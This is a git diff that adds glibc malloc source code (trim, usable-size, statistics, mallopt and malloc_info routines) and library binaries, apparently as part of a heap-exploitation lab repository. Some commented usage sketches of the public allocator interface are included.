+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
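+
+/* Illustrative sketch, not part of the glibc sources: how an application
+   might drive the dispatch above through the public mallopt() interface.
+   The function name and the chosen values are examples only.
+
+   #include <malloc.h>
+   #include <stdio.h>
+
+   static void tune_allocator (void)
+   {
+     // Cap fastbin requests at 32 bytes; mallopt returns 0 on rejection.
+     if (mallopt (M_MXFAST, 32) == 0)
+       fputs ("M_MXFAST value rejected\n", stderr);
+
+     // Send requests of 1 MiB and up straight to mmap; as shown above,
+     // this also sets mp_.no_dyn_threshold and so freezes the threshold.
+     mallopt (M_MMAP_THRESHOLD, 1024 * 1024);
+   }
+*/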
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
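+
+/* Illustrative sketch, not part of the glibc sources: the alignment checks
+   above as seen from application code (the function name is hypothetical).
+
+   #include <stdlib.h>
+
+   static void *aligned_block (size_t n)
+   {
+     void *p = NULL;
+     // 64 is a power-of-two multiple of sizeof (void *), so this succeeds.
+     if (posix_memalign (&p, 64, n) == 0)
+       return p;
+     // An alignment such as 24 (a multiple of sizeof (void *) but not a
+     // power of two) would instead make the call return EINVAL; note the
+     // error comes back as the return value, errno is left untouched.
+     return NULL;
+   }
+*/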
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
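+
+/* Illustrative sketch, not part of the glibc sources: emitting the XML
+   report produced above from application code (the function name is
+   hypothetical).
+
+   #include <malloc.h>
+   #include <stdio.h>
+
+   static void dump_heap_xml (void)
+   {
+     // options must be 0 for now; anything else is reported as EINVAL.
+     if (malloc_info (0, stderr) != 0)
+       fputs ("malloc_info failed\n", stderr);
+   }
+*/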
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so
new file mode 100755
index 0000000..a623755
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so
new file mode 100755
index 0000000..5b2d759
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so
new file mode 100755
index 0000000..a8cb029
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2 b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2
new file mode 120000
index 0000000..2ffc93b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2
@@ -0,0 +1 @@
+ld-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so
new file mode 100755
index 0000000..f5b26e3
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6 b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6
new file mode 120000
index 0000000..aa8ad7a
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6
@@ -0,0 +1 @@
+libc-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28/ld-2.28.so b/HeapLAB/.glibc/glibc_2.28/ld-2.28.so
new file mode 100755
index 0000000..f8f0382
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28/ld-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28/ld.so.2 b/HeapLAB/.glibc/glibc_2.28/ld.so.2
new file mode 120000
index 0000000..695c5dc
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28/ld.so.2
@@ -0,0 +1 @@
+ld-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28/libc-2.28.so b/HeapLAB/.glibc/glibc_2.28/libc-2.28.so
new file mode 100755
index 0000000..22c09b1
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28/libc-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28/libc.so.6 b/HeapLAB/.glibc/glibc_2.28/libc.so.6
new file mode 120000
index 0000000..695ffa0
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28/libc.so.6
@@ -0,0 +1 @@
+libc-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.28/malloc/malloc.c
new file mode 100644
index 0000000..e247c77
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28/malloc/malloc.c
@@ -0,0 +1,5593 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
